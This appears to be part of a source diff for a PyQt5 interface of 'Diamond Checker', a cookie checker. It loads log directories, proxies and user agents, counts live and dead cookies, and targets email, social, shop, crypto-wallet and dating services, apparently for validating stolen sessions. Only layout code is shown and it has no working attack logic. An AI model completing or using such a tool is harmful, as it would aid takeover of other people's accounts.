+QRadioButton::indicator:hover, +QCheckBox::indicator:hover { + border-color: rgba(29, 233, 182, 0.8); +} + +QRadioButton::indicator:checked:hover, +QCheckBox::indicator:checked:hover { + border-color: #1de9b6; +} + + + The path to the proxy + + + + + + 10 + 360 + 331 + 31 + + + + + Furore + 10 + + + + QLineEdit, +QComboBox, +QDateTimeEdit, +QSpinBox, +QDoubleSpinBox { + color: #1de9b6; + background-color: #31363b; + border: 2px solid #1de9b6; + border-radius: 4px; + height: 32px; +} + +QWidget { + background-color: #232629; + color: #ffffff; +} + +QGroupBox, +QFrame { + background-color: #232629; + border: 2px solid #4f5b62; + border-radius: 4px; +} + +QRadioButton::indicator, +QCheckBox::indicator { + width: 16px; + height: 16px; + border: 2px solid #1de9b6; + border-radius: 0; + transform: rotate(45deg); + transform-origin: center; +} + +QRadioButton::indicator:checked, +QCheckBox::indicator:checked { + background-color: #1de9b6; + border-color: #1de9b6; +} + +QRadioButton::indicator:hover, +QCheckBox::indicator:hover { + border-color: rgba(29, 233, 182, 0.8); +} + +QRadioButton::indicator:checked:hover, +QCheckBox::indicator:checked:hover { + border-color: #1de9b6; +} + + + The path to user agents + + + + + + 440 + 360 + 81 + 31 + + + + + MS Shell Dlg 2 + 9 + true + + + + color: #c8c8c8 + + + Enable + + + + + + 10 + 740 + 601 + 51 + + + + QLineEdit, +QComboBox, +QDateTimeEdit, +QSpinBox, +QDoubleSpinBox { + color: #1de9b6; + background-color: #31363b; + border: 2px solid #1de9b6; + border-radius: 4px; + height: 32px; +} + +QWidget { + background-color: #232629; + color: #ffffff; +} + +QGroupBox, +QFrame { + background-color: #232629; + border: 2px solid #4f5b62; + border-radius: 4px; +} + +QRadioButton::indicator, +QCheckBox::indicator { + width: 16px; + height: 16px; + border: 2px solid #1de9b6; + border-radius: 0; + transform: rotate(45deg); + transform-origin: center; +} + +QRadioButton::indicator:checked, +QCheckBox::indicator:checked { + background-color: #1de9b6; + border-color: #1de9b6; +} + +QRadioButton::indicator:hover, +QCheckBox::indicator:hover { + border-color: rgba(29, 233, 182, 0.8); +} + +QRadioButton::indicator:checked:hover, +QCheckBox::indicator:checked:hover { + border-color: #1de9b6; +} + + + + + + + + + 620 + 740 + 171 + 51 + + + + + Furore + 12 + + + + QLineEdit, +QComboBox, +QDateTimeEdit, +QSpinBox, +QDoubleSpinBox { + color: #1de9b6; + background-color: #31363b; + border: 2px solid #1de9b6; + border-radius: 4px; + height: 32px; +} + +QWidget { + background-color: #232629; + color: #ffffff; +} + +QGroupBox, +QFrame { + background-color: #232629; + border: 2px solid #4f5b62; + border-radius: 4px; +} + +QRadioButton::indicator, +QCheckBox::indicator { + width: 16px; + height: 16px; + border: 2px solid #1de9b6; + border-radius: 0; + transform: rotate(45deg); + transform-origin: center; +} + +QRadioButton::indicator:checked, +QCheckBox::indicator:checked { + background-color: #1de9b6; + border-color: #1de9b6; +} + +QRadioButton::indicator:hover, +QCheckBox::indicator:hover { + border-color: rgba(29, 233, 182, 0.8); +} + +QRadioButton::indicator:checked:hover, +QCheckBox::indicator:checked:hover { + border-color: #1de9b6; +} + + + Start + + + + + + 180 + 750 + 421 + 31 + + + + background-color: #181818; +border: 3px solid #363636; +color: #c8c8c8 + + + 24 + + + false + + + Qt::Horizontal + + + false + + + + + + 430 + 280 + 91 + 31 + + + + + + + Choose a path + + + + + + 340 + 320 + 91 + 31 + + + + + + + Choose a path + + + + + + 340 + 360 + 91 + 31 + + + + + + + Choose a path + + + + + + 10 + 20 + 781 + 251 + + + + background-color: #181818; +border: 3px solid #363636; +color: #c8c8c8 + + + <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/REC-html40/strict.dtd"> +<html><head><meta name="qrichtext" content="1" /><meta charset="utf-8" /><style type="text/css"> +p, li { white-space: pre-wrap; } +hr { height: 1px; border-width: 0; } +li.unchecked::marker { content: "\2610"; } +li.checked::marker { content: "\2612"; } +</style></head><body style=" font-family:'Segoe UI'; font-size:9pt; font-weight:400; font-style:normal;"> +<p align="center" style="-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;"><br /></p></body></html> + + + Diamond Checker - A Cookie Checker Brought To You By DiamondSorter - An Opensourced.Pro Project + + + + + + 10 + 740 + 161 + 51 + + + + + Furore + 10 + + + + + + + Threads + + + + + + 90 + 750 + 71 + 31 + + + + + Impact + 10 + + + + QLineEdit, +QComboBox, +QDateTimeEdit, +QSpinBox, +QDoubleSpinBox { + color: #1de9b6; + background-color: #31363b; + border: 2px solid #1de9b6; + border-radius: 4px; + height: 32px; +} + +QWidget { + background-color: #232629; + color: #ffffff; +} + +QGroupBox, +QFrame { + background-color: #232629; + border: 2px solid #4f5b62; + border-radius: 4px; +} + +QRadioButton::indicator, +QCheckBox::indicator { + width: 16px; + height: 16px; + border: 2px solid #1de9b6; + border-radius: 0; + transform: rotate(45deg); + transform-origin: center; +} + +QRadioButton::indicator:checked, +QCheckBox::indicator:checked { + background-color: #1de9b6; + border-color: #1de9b6; +} + +QRadioButton::indicator:hover, +QCheckBox::indicator:hover { + border-color: rgba(29, 233, 182, 0.8); +} + +QRadioButton::indicator:checked:hover, +QCheckBox::indicator:checked:hover { + border-color: #1de9b6; +} + + + + + + 0 + 0 + 801 + 5 + + + + + + + true + + + + + + 440 + 320 + 71 + 21 + + + + + MS Sans Serif + 10 + + + + + + + + off + + + + + socks4 + + + + + socks5 + + + + + http + + + + + + + 530 + 280 + 261 + 131 + + + + + Impact + 12 + + + + + + + + + + + + + 10 + 430 + 781 + 281 + + + + + Furore + + + + Qt::TabFocus + + + Qt::DefaultContextMenu + + + false + + + QTabWidget::pane { /* The tab widget frame */ + border-top: 2px solid #000000; + position: absolute; + top: -0.5em; +} + +QTabWidget::tab-bar { + alignment: center; +} + +/* Style the tab using the tab sub-control. Note that + it reads QTabBar _not_ QTabWidget */ +QTabBar::tab { + background: qlineargradient(x1: 0, y1: 0, x2: 0, y2: 1, + stop: 0 #000000, stop: 0.4 #000000, + stop: 0.5 #000000, stop: 1.0 #000000); + border: 2px solid ; + selection-color: rgb(15, 255, 167); + border-bottom-color: #000000; /* same as the pane color */ + border-top-left-radius: 12px; + border-top-right-radius: 12px; + min-width: 8ex; + padding: 8px; +} + +QTabBar::tab:selected, QTabBar::tab:hover { + background: qlineargradient(x1: 0, y1: 0, x2: 0, y2: 1, + stop: 0 #000000, stop: 0.4 #000000, + stop: 0.5 #000000, stop: 1.0 #000000); +} + +QTabBar::tab:selected { + border-color: #00def2; + border-bottom-color: #00def2; /* same as pane color */ +} + + + QTabWidget::North + + + QTabWidget::Rounded + + + 0 + + + Qt::ElideNone + + + false + + + false + + + + Inbox + + + + + 9 + 10 + 761 + 221 + + + + + + + false + + + Gmail + + + + + + + false + + + Yandex + + + + + + + false + + + Yahoo + + + + + + + false + + + Outlook + + + + + + + false + + + Webmail + + + + + + + false + + + Mail.Ru + + + + + + + false + + + Cpanel + + + + + + + false + + + Office + + + + + + + + + Ads + + + + + 10 + 10 + 761 + 211 + + + + + + + false + + + Bing Ads + + + + + + + false + + + Reddit Ads + + + + + + + false + + + AHref SEO + + + + + + + false + + + Snapchat Ads + + + + + + + false + + + Tinder Ads + + + + + + + false + + + Twitter Ads + + + + + + + false + + + SEM Rush + + + + + + + false + + + Craigslist Ads + + + + + + + Facebook Ads + + + + + + + false + + + Microsoft Ads + + + + + + + + + Games + + + + + 10 + 10 + 761 + 201 + + + + + + + + Furore + + + + + + + Steam + + + + + + + + Furore + + + + + + + PathofExile + + + + + + + + Furore + + + + + + + Roblox + + + + + + + + Furore + + + + + + + BattleNet + + + + + + + + + Social network + + + + + 10 + 10 + 761 + 231 + + + + + + + + Furore + + + + + + + Instagram + + + + + + + false + + + + Arial + + + + Myspace + + + + + + + false + + + Reddit + + + + + + + + Furore + + + + + + + Discord + + + + + + + Kick + + + + + + + + Furore + + + + + + + Facebook + + + + + + + + Furore + + + + + + + TikTok + + + + + + + false + + + Pintrest + + + + + + + + Furore + + + + + + + YouTube + + + + + + + Vimeo + + + + + + + false + + + Rumble + + + + + + + false + + + Locals + + + + + + + false + + + Snapchat + + + + + + + false + + + Patreon + + + + + + + + Furore + + + + + + + Netflix + + + + + + + + Furore + + + + + + + VK + + + + + + + false + + + Twitch + + + + + + + false + + + LinkedIn + + + + + + + + + Crypto wallet + + + + + 10 + 10 + 761 + 221 + + + + + + + + Furore + + + + + + + CoinBase + + + + + + + + Furore + + + + + + + Kryptex + + + + + + + + Furore + + + + + + + HitBTC + + + + + + + + Furore + + + + + + + FreeBitcoin + + + + + + + + + Shop + + + + + 10 + 10 + 731 + 211 + + + + + + + + Furore + + + + + + + Amazon + + + + + + + false + + + Ebay + + + + + + + false + + + AirBNB + + + + + + + false + + + Envato Elements + + + + + + + false + + + Flipkart + + + + + + + + Furore + + + + + + + FunPay + + + + + + + false + + + Kleinanzeigen + + + + + + + false + + + Booking.com + + + + + + + false + + + Uber Eats + + + + + + + false + + + DH Gate + + + + + + + + Furore + + + + + + + Humble + + + + + + + false + + + Temu + + + + + + + false + + + Fiverr + + + + + + + false + + + Zillow + + + + + + + false + + + Instacart + + + + + + + Google Play + + + + + + + false + + + Vinted + + + + + + + false + + + Walmart + + + + + + + + + Daiting + + + + + 20 + 0 + 751 + 221 + + + + + + + false + + + AshleyMaddison + + + + + + + false + + + Zoosk + + + + + + + false + + + MeetMe + + + + + + + false + + + EHarmony + + + + + + + false + + + Tinder + + + + + + + false + + + ChristanMingle + + + + + + + + + + + 540 + 280 + 71 + 31 + + + + Number of: + + + + + + 540 + 310 + 71 + 31 + + + + Files: + + + + + + 540 + 340 + 71 + 31 + + + + Folders: + + + + + + 540 + 380 + 71 + 21 + + + + Cookies: + + + + + + 700 + 290 + 81 + 21 + + + + Cookie Stats: + + + + + + 700 + 320 + 71 + 21 + + + + Live: + + + + + + 700 + 350 + 71 + 21 + + + + Dead: + + + + + + 700 + 380 + 71 + 21 + + + + Errors: + + + stats_box + lineEdit_dir + lineEdit_proxy + lineEdit_ua + checkBox_ua + label_2 + pushButton + progressBar + pushButton_dir_logs + pushButton_proxies_files + pushButton_useragents_file + textEdit_console + social_network_label + spinBox_thr + label_lgbt + comboBox_proxy + inbox_tab_widget + number_of_label + files_label + folders_label + cookies_label + cookie_stats_label + live_label + dead_label + errors_label + + + + + + + pushButton_proxies_files + clicked() + MainWindow + proxies_file() + + + 500 + 350 + + + 399 + 436 + + + + + pushButton_dir_logs + clicked() + MainWindow + dir_logs() + + + 500 + 295 + + + 399 + 436 + + + + + pushButton_useragents_file + clicked() + MainWindow + useragents_file() + + + 500 + 395 + + + 399 + 436 + + + + + + dir_logs() + proxies_file() + useragents_file() + + diff --git a/DiamondChecker/main_ui1.py b/DiamondChecker/main_ui1.py index b320c89..e54b86b 100644 --- a/DiamondChecker/main_ui1.py +++ b/DiamondChecker/main_ui1.py @@ -1,1092 +1,1092 @@ -# -*- coding: utf-8 -*- - -# Form implementation generated from reading ui file 'main_ui.ui' -# -# Created by: PyQt5 UI code generator 5.15.9 -# -# WARNING: Any manual changes made to this file will be lost when pyuic5 is -# run again. Do not edit this file unless you know what you are doing. - - -from PyQt5 import QtCore, QtGui, QtWidgets - - -class Ui_MainWindow(object): - def setupUi(self, MainWindow): - MainWindow.setObjectName("MainWindow") - MainWindow.resize(801, 820) - MainWindow.setMinimumSize(QtCore.QSize(801, 677)) - MainWindow.setMaximumSize(QtCore.QSize(801, 999)) - MainWindow.setSizeIncrement(QtCore.QSize(801, 677)) - MainWindow.setBaseSize(QtCore.QSize(801, 677)) - MainWindow.setStyleSheet("QLineEdit,\n" -"QComboBox,\n" -"QDateTimeEdit,\n" -"QSpinBox,\n" -"QDoubleSpinBox {\n" -" color: #1de9b6;\n" -" background-color: #31363b;\n" -" border: 2px solid #1de9b6;\n" -" border-radius: 4px;\n" -" height: 32px;\n" -"}\n" -"\n" -"QWidget {\n" -" background-color: #232629;\n" -" color: #ffffff;\n" -"}\n" -"\n" -"QGroupBox,\n" -"QFrame {\n" -" background-color: #232629;\n" -" border: 2px solid #4f5b62;\n" -" border-radius: 4px;\n" -"}\n" -"\n" -"QRadioButton::indicator,\n" -"QCheckBox::indicator {\n" -" width: 16px;\n" -" height: 16px;\n" -" border: 2px solid #1de9b6;\n" -" border-radius: 0;\n" -" transform: rotate(45deg);\n" -" transform-origin: center;\n" -"}\n" -"\n" -"QRadioButton::indicator:checked,\n" -"QCheckBox::indicator:checked {\n" -" background-color: #1de9b6;\n" -" border-color: #1de9b6;\n" -"}\n" -"\n" -"QRadioButton::indicator:hover,\n" -"QCheckBox::indicator:hover {\n" -" border-color: rgba(29, 233, 182, 0.8);\n" -"}\n" -"\n" -"QRadioButton::indicator:checked:hover,\n" -"QCheckBox::indicator:checked:hover {\n" -" border-color: #1de9b6;\n" -"}") - self.centralwidget = QtWidgets.QWidget(MainWindow) - self.centralwidget.setObjectName("centralwidget") - self.lineEdit_dir = QtWidgets.QLineEdit(self.centralwidget) - self.lineEdit_dir.setGeometry(QtCore.QRect(10, 280, 421, 31)) - font = QtGui.QFont() - font.setFamily("Furore") - font.setPointSize(10) - self.lineEdit_dir.setFont(font) - self.lineEdit_dir.setStyleSheet("QLineEdit,\n" -"QComboBox,\n" -"QDateTimeEdit,\n" -"QSpinBox,\n" -"QDoubleSpinBox {\n" -" color: #1de9b6;\n" -" background-color: #31363b;\n" -" border: 2px solid #1de9b6;\n" -" border-radius: 4px;\n" -" height: 32px;\n" -"}\n" -"\n" -"QWidget {\n" -" background-color: #232629;\n" -" color: #ffffff;\n" -"}\n" -"\n" -"QGroupBox,\n" -"QFrame {\n" -" background-color: #232629;\n" -" border: 2px solid #4f5b62;\n" -" border-radius: 4px;\n" -"}\n" -"\n" -"QRadioButton::indicator,\n" -"QCheckBox::indicator {\n" -" width: 16px;\n" -" height: 16px;\n" -" border: 2px solid #1de9b6;\n" -" border-radius: 0;\n" -" transform: rotate(45deg);\n" -" transform-origin: center;\n" -"}\n" -"\n" -"QRadioButton::indicator:checked,\n" -"QCheckBox::indicator:checked {\n" -" background-color: #1de9b6;\n" -" border-color: #1de9b6;\n" -"}\n" -"\n" -"QRadioButton::indicator:hover,\n" -"QCheckBox::indicator:hover {\n" -" border-color: rgba(29, 233, 182, 0.8);\n" -"}\n" -"\n" -"QRadioButton::indicator:checked:hover,\n" -"QCheckBox::indicator:checked:hover {\n" -" border-color: #1de9b6;\n" -"}") - self.lineEdit_dir.setObjectName("lineEdit_dir") - self.lineEdit_proxy = QtWidgets.QLineEdit(self.centralwidget) - self.lineEdit_proxy.setGeometry(QtCore.QRect(10, 320, 331, 31)) - font = QtGui.QFont() - font.setFamily("Furore") - font.setPointSize(10) - self.lineEdit_proxy.setFont(font) - self.lineEdit_proxy.setStyleSheet("QLineEdit,\n" -"QComboBox,\n" -"QDateTimeEdit,\n" -"QSpinBox,\n" -"QDoubleSpinBox {\n" -" color: #1de9b6;\n" -" background-color: #31363b;\n" -" border: 2px solid #1de9b6;\n" -" border-radius: 4px;\n" -" height: 32px;\n" -"}\n" -"\n" -"QWidget {\n" -" background-color: #232629;\n" -" color: #ffffff;\n" -"}\n" -"\n" -"QGroupBox,\n" -"QFrame {\n" -" background-color: #232629;\n" -" border: 2px solid #4f5b62;\n" -" border-radius: 4px;\n" -"}\n" -"\n" -"QRadioButton::indicator,\n" -"QCheckBox::indicator {\n" -" width: 16px;\n" -" height: 16px;\n" -" border: 2px solid #1de9b6;\n" -" border-radius: 0;\n" -" transform: rotate(45deg);\n" -" transform-origin: center;\n" -"}\n" -"\n" -"QRadioButton::indicator:checked,\n" -"QCheckBox::indicator:checked {\n" -" background-color: #1de9b6;\n" -" border-color: #1de9b6;\n" -"}\n" -"\n" -"QRadioButton::indicator:hover,\n" -"QCheckBox::indicator:hover {\n" -" border-color: rgba(29, 233, 182, 0.8);\n" -"}\n" -"\n" -"QRadioButton::indicator:checked:hover,\n" -"QCheckBox::indicator:checked:hover {\n" -" border-color: #1de9b6;\n" -"}") - self.lineEdit_proxy.setObjectName("lineEdit_proxy") - self.lineEdit_ua = QtWidgets.QLineEdit(self.centralwidget) - self.lineEdit_ua.setGeometry(QtCore.QRect(10, 360, 331, 31)) - font = QtGui.QFont() - font.setFamily("Furore") - font.setPointSize(10) - self.lineEdit_ua.setFont(font) - self.lineEdit_ua.setStyleSheet("QLineEdit,\n" -"QComboBox,\n" -"QDateTimeEdit,\n" -"QSpinBox,\n" -"QDoubleSpinBox {\n" -" color: #1de9b6;\n" -" background-color: #31363b;\n" -" border: 2px solid #1de9b6;\n" -" border-radius: 4px;\n" -" height: 32px;\n" -"}\n" -"\n" -"QWidget {\n" -" background-color: #232629;\n" -" color: #ffffff;\n" -"}\n" -"\n" -"QGroupBox,\n" -"QFrame {\n" -" background-color: #232629;\n" -" border: 2px solid #4f5b62;\n" -" border-radius: 4px;\n" -"}\n" -"\n" -"QRadioButton::indicator,\n" -"QCheckBox::indicator {\n" -" width: 16px;\n" -" height: 16px;\n" -" border: 2px solid #1de9b6;\n" -" border-radius: 0;\n" -" transform: rotate(45deg);\n" -" transform-origin: center;\n" -"}\n" -"\n" -"QRadioButton::indicator:checked,\n" -"QCheckBox::indicator:checked {\n" -" background-color: #1de9b6;\n" -" border-color: #1de9b6;\n" -"}\n" -"\n" -"QRadioButton::indicator:hover,\n" -"QCheckBox::indicator:hover {\n" -" border-color: rgba(29, 233, 182, 0.8);\n" -"}\n" -"\n" -"QRadioButton::indicator:checked:hover,\n" -"QCheckBox::indicator:checked:hover {\n" -" border-color: #1de9b6;\n" -"}") - self.lineEdit_ua.setObjectName("lineEdit_ua") - self.checkBox_ua = QtWidgets.QCheckBox(self.centralwidget) - self.checkBox_ua.setGeometry(QtCore.QRect(440, 360, 81, 31)) - font = QtGui.QFont() - font.setFamily("MS Shell Dlg 2") - font.setPointSize(9) - font.setBold(True) - self.checkBox_ua.setFont(font) - self.checkBox_ua.setStyleSheet("color: #c8c8c8") - self.checkBox_ua.setObjectName("checkBox_ua") - self.label_2 = QtWidgets.QLabel(self.centralwidget) - self.label_2.setGeometry(QtCore.QRect(10, 740, 601, 51)) - self.label_2.setStyleSheet("QLineEdit,\n" -"QComboBox,\n" -"QDateTimeEdit,\n" -"QSpinBox,\n" -"QDoubleSpinBox {\n" -" color: #1de9b6;\n" -" background-color: #31363b;\n" -" border: 2px solid #1de9b6;\n" -" border-radius: 4px;\n" -" height: 32px;\n" -"}\n" -"\n" -"QWidget {\n" -" background-color: #232629;\n" -" color: #ffffff;\n" -"}\n" -"\n" -"QGroupBox,\n" -"QFrame {\n" -" background-color: #232629;\n" -" border: 2px solid #4f5b62;\n" -" border-radius: 4px;\n" -"}\n" -"\n" -"QRadioButton::indicator,\n" -"QCheckBox::indicator {\n" -" width: 16px;\n" -" height: 16px;\n" -" border: 2px solid #1de9b6;\n" -" border-radius: 0;\n" -" transform: rotate(45deg);\n" -" transform-origin: center;\n" -"}\n" -"\n" -"QRadioButton::indicator:checked,\n" -"QCheckBox::indicator:checked {\n" -" background-color: #1de9b6;\n" -" border-color: #1de9b6;\n" -"}\n" -"\n" -"QRadioButton::indicator:hover,\n" -"QCheckBox::indicator:hover {\n" -" border-color: rgba(29, 233, 182, 0.8);\n" -"}\n" -"\n" -"QRadioButton::indicator:checked:hover,\n" -"QCheckBox::indicator:checked:hover {\n" -" border-color: #1de9b6;\n" -"}") - self.label_2.setText("") - self.label_2.setObjectName("label_2") - self.pushButton = QtWidgets.QPushButton(self.centralwidget) - self.pushButton.setGeometry(QtCore.QRect(620, 740, 171, 51)) - font = QtGui.QFont() - font.setFamily("Furore") - font.setPointSize(12) - self.pushButton.setFont(font) - self.pushButton.setStyleSheet("QLineEdit,\n" -"QComboBox,\n" -"QDateTimeEdit,\n" -"QSpinBox,\n" -"QDoubleSpinBox {\n" -" color: #1de9b6;\n" -" background-color: #31363b;\n" -" border: 2px solid #1de9b6;\n" -" border-radius: 4px;\n" -" height: 32px;\n" -"}\n" -"\n" -"QWidget {\n" -" background-color: #232629;\n" -" color: #ffffff;\n" -"}\n" -"\n" -"QGroupBox,\n" -"QFrame {\n" -" background-color: #232629;\n" -" border: 2px solid #4f5b62;\n" -" border-radius: 4px;\n" -"}\n" -"\n" -"QRadioButton::indicator,\n" -"QCheckBox::indicator {\n" -" width: 16px;\n" -" height: 16px;\n" -" border: 2px solid #1de9b6;\n" -" border-radius: 0;\n" -" transform: rotate(45deg);\n" -" transform-origin: center;\n" -"}\n" -"\n" -"QRadioButton::indicator:checked,\n" -"QCheckBox::indicator:checked {\n" -" background-color: #1de9b6;\n" -" border-color: #1de9b6;\n" -"}\n" -"\n" -"QRadioButton::indicator:hover,\n" -"QCheckBox::indicator:hover {\n" -" border-color: rgba(29, 233, 182, 0.8);\n" -"}\n" -"\n" -"QRadioButton::indicator:checked:hover,\n" -"QCheckBox::indicator:checked:hover {\n" -" border-color: #1de9b6;\n" -"}") - self.pushButton.setObjectName("pushButton") - self.progressBar = QtWidgets.QProgressBar(self.centralwidget) - self.progressBar.setGeometry(QtCore.QRect(180, 750, 421, 31)) - self.progressBar.setStyleSheet("background-color: #181818;\n" -"border: 3px solid #363636;\n" -"color: #c8c8c8") - self.progressBar.setProperty("value", 24) - self.progressBar.setTextVisible(False) - self.progressBar.setOrientation(QtCore.Qt.Horizontal) - self.progressBar.setInvertedAppearance(False) - self.progressBar.setObjectName("progressBar") - self.pushButton_dir_logs = QtWidgets.QPushButton(self.centralwidget) - self.pushButton_dir_logs.setGeometry(QtCore.QRect(430, 280, 91, 31)) - self.pushButton_dir_logs.setStyleSheet("") - self.pushButton_dir_logs.setObjectName("pushButton_dir_logs") - self.pushButton_proxies_files = QtWidgets.QPushButton(self.centralwidget) - self.pushButton_proxies_files.setGeometry(QtCore.QRect(340, 320, 91, 31)) - self.pushButton_proxies_files.setStyleSheet("") - self.pushButton_proxies_files.setObjectName("pushButton_proxies_files") - self.pushButton_useragents_file = QtWidgets.QPushButton(self.centralwidget) - self.pushButton_useragents_file.setGeometry(QtCore.QRect(340, 360, 91, 31)) - self.pushButton_useragents_file.setStyleSheet("") - self.pushButton_useragents_file.setObjectName("pushButton_useragents_file") - self.textEdit_console = QtWidgets.QTextEdit(self.centralwidget) - self.textEdit_console.setGeometry(QtCore.QRect(10, 20, 781, 251)) - self.textEdit_console.setStyleSheet("background-color: #181818;\n" -"border: 3px solid #363636;\n" -"color: #c8c8c8") - self.textEdit_console.setObjectName("textEdit_console") - self.social_network_label = QtWidgets.QLabel(self.centralwidget) - self.social_network_label.setGeometry(QtCore.QRect(10, 740, 161, 51)) - font = QtGui.QFont() - font.setFamily("Furore") - font.setPointSize(10) - self.social_network_label.setFont(font) - self.social_network_label.setStyleSheet("") - self.social_network_label.setObjectName("social_network_label") - self.spinBox_thr = QtWidgets.QSpinBox(self.centralwidget) - self.spinBox_thr.setGeometry(QtCore.QRect(90, 750, 71, 31)) - font = QtGui.QFont() - font.setFamily("Impact") - font.setPointSize(10) - self.spinBox_thr.setFont(font) - self.spinBox_thr.setStyleSheet("QLineEdit,\n" -"QComboBox,\n" -"QDateTimeEdit,\n" -"QSpinBox,\n" -"QDoubleSpinBox {\n" -" color: #1de9b6;\n" -" background-color: #31363b;\n" -" border: 2px solid #1de9b6;\n" -" border-radius: 4px;\n" -" height: 32px;\n" -"}\n" -"\n" -"QWidget {\n" -" background-color: #232629;\n" -" color: #ffffff;\n" -"}\n" -"\n" -"QGroupBox,\n" -"QFrame {\n" -" background-color: #232629;\n" -" border: 2px solid #4f5b62;\n" -" border-radius: 4px;\n" -"}\n" -"\n" -"QRadioButton::indicator,\n" -"QCheckBox::indicator {\n" -" width: 16px;\n" -" height: 16px;\n" -" border: 2px solid #1de9b6;\n" -" border-radius: 0;\n" -" transform: rotate(45deg);\n" -" transform-origin: center;\n" -"}\n" -"\n" -"QRadioButton::indicator:checked,\n" -"QCheckBox::indicator:checked {\n" -" background-color: #1de9b6;\n" -" border-color: #1de9b6;\n" -"}\n" -"\n" -"QRadioButton::indicator:hover,\n" -"QCheckBox::indicator:hover {\n" -" border-color: rgba(29, 233, 182, 0.8);\n" -"}\n" -"\n" -"QRadioButton::indicator:checked:hover,\n" -"QCheckBox::indicator:checked:hover {\n" -" border-color: #1de9b6;\n" -"}") - self.spinBox_thr.setObjectName("spinBox_thr") - self.label_lgbt = QtWidgets.QLabel(self.centralwidget) - self.label_lgbt.setGeometry(QtCore.QRect(0, 0, 801, 5)) - self.label_lgbt.setText("") - self.label_lgbt.setScaledContents(True) - self.label_lgbt.setObjectName("label_lgbt") - self.comboBox_proxy = QtWidgets.QComboBox(self.centralwidget) - self.comboBox_proxy.setGeometry(QtCore.QRect(440, 320, 71, 21)) - font = QtGui.QFont() - font.setFamily("MS Sans Serif") - font.setPointSize(10) - self.comboBox_proxy.setFont(font) - self.comboBox_proxy.setStyleSheet("") - self.comboBox_proxy.setObjectName("comboBox_proxy") - self.comboBox_proxy.addItem("") - self.comboBox_proxy.addItem("") - self.comboBox_proxy.addItem("") - self.comboBox_proxy.addItem("") - self.stats_box = QtWidgets.QLabel(self.centralwidget) - self.stats_box.setGeometry(QtCore.QRect(530, 280, 261, 131)) - font = QtGui.QFont() - font.setFamily("Impact") - font.setPointSize(12) - self.stats_box.setFont(font) - self.stats_box.setStyleSheet("") - self.stats_box.setText("") - self.stats_box.setObjectName("stats_box") - self.inbox_tab_widget = QtWidgets.QTabWidget(self.centralwidget) - self.inbox_tab_widget.setGeometry(QtCore.QRect(10, 430, 781, 281)) - font = QtGui.QFont() - font.setFamily("Furore") - self.inbox_tab_widget.setFont(font) - self.inbox_tab_widget.setFocusPolicy(QtCore.Qt.TabFocus) - self.inbox_tab_widget.setContextMenuPolicy(QtCore.Qt.DefaultContextMenu) - self.inbox_tab_widget.setAutoFillBackground(False) - self.inbox_tab_widget.setStyleSheet("QTabWidget::pane { /* The tab widget frame */\n" -" border-top: 2px solid #000000;\n" -" position: absolute;\n" -" top: -0.5em;\n" -"}\n" -"\n" -"QTabWidget::tab-bar {\n" -" alignment: center;\n" -"}\n" -"\n" -"/* Style the tab using the tab sub-control. Note that\n" -" it reads QTabBar _not_ QTabWidget */\n" -"QTabBar::tab {\n" -" background: qlineargradient(x1: 0, y1: 0, x2: 0, y2: 1,\n" -" stop: 0 #000000, stop: 0.4 #000000,\n" -" stop: 0.5 #000000, stop: 1.0 #000000);\n" -" border: 2px solid ;\n" -" selection-color: rgb(15, 255, 167);\n" -" border-bottom-color: #000000; /* same as the pane color */\n" -" border-top-left-radius: 12px;\n" -" border-top-right-radius: 12px;\n" -" min-width: 8ex;\n" -" padding: 8px;\n" -"}\n" -"\n" -"QTabBar::tab:selected, QTabBar::tab:hover {\n" -" background: qlineargradient(x1: 0, y1: 0, x2: 0, y2: 1,\n" -" stop: 0 #000000, stop: 0.4 #000000,\n" -" stop: 0.5 #000000, stop: 1.0 #000000);\n" -"}\n" -"\n" -"QTabBar::tab:selected {\n" -" border-color: #00def2;\n" -" border-bottom-color: #00def2; /* same as pane color */\n" -"}") - self.inbox_tab_widget.setTabPosition(QtWidgets.QTabWidget.North) - self.inbox_tab_widget.setTabShape(QtWidgets.QTabWidget.Rounded) - self.inbox_tab_widget.setElideMode(QtCore.Qt.ElideNone) - self.inbox_tab_widget.setMovable(False) - self.inbox_tab_widget.setTabBarAutoHide(False) - self.inbox_tab_widget.setObjectName("inbox_tab_widget") - self.inbox_tab = QtWidgets.QWidget() - self.inbox_tab.setObjectName("inbox_tab") - self.widget = QtWidgets.QWidget(self.inbox_tab) - self.widget.setGeometry(QtCore.QRect(9, 10, 761, 221)) - self.widget.setObjectName("widget") - self.inbox_checkbox_gridlayout = QtWidgets.QGridLayout(self.widget) - self.inbox_checkbox_gridlayout.setContentsMargins(0, 0, 0, 0) - self.inbox_checkbox_gridlayout.setObjectName("inbox_checkbox_gridlayout") - self.gmail_inbox_checkbox = QtWidgets.QCheckBox(self.widget) - self.gmail_inbox_checkbox.setEnabled(False) - self.gmail_inbox_checkbox.setObjectName("gmail_inbox_checkbox") - self.inbox_checkbox_gridlayout.addWidget(self.gmail_inbox_checkbox, 0, 0, 1, 1) - self.yandex_checkbox = QtWidgets.QCheckBox(self.widget) - self.yandex_checkbox.setEnabled(False) - self.yandex_checkbox.setObjectName("yandex_checkbox") - self.inbox_checkbox_gridlayout.addWidget(self.yandex_checkbox, 0, 1, 1, 1) - self.yahoo_checkbox = QtWidgets.QCheckBox(self.widget) - self.yahoo_checkbox.setEnabled(False) - self.yahoo_checkbox.setObjectName("yahoo_checkbox") - self.inbox_checkbox_gridlayout.addWidget(self.yahoo_checkbox, 1, 0, 1, 1) - self.outlook_checkbox = QtWidgets.QCheckBox(self.widget) - self.outlook_checkbox.setEnabled(False) - self.outlook_checkbox.setObjectName("outlook_checkbox") - self.inbox_checkbox_gridlayout.addWidget(self.outlook_checkbox, 1, 1, 1, 1) - self.webmail_checkbox = QtWidgets.QCheckBox(self.widget) - self.webmail_checkbox.setEnabled(False) - self.webmail_checkbox.setObjectName("webmail_checkbox") - self.inbox_checkbox_gridlayout.addWidget(self.webmail_checkbox, 2, 0, 1, 1) - self.mailru_checkbox = QtWidgets.QCheckBox(self.widget) - self.mailru_checkbox.setEnabled(False) - self.mailru_checkbox.setObjectName("mailru_checkbox") - self.inbox_checkbox_gridlayout.addWidget(self.mailru_checkbox, 2, 1, 1, 1) - self.cpanel_checkbox = QtWidgets.QCheckBox(self.widget) - self.cpanel_checkbox.setEnabled(False) - self.cpanel_checkbox.setObjectName("cpanel_checkbox") - 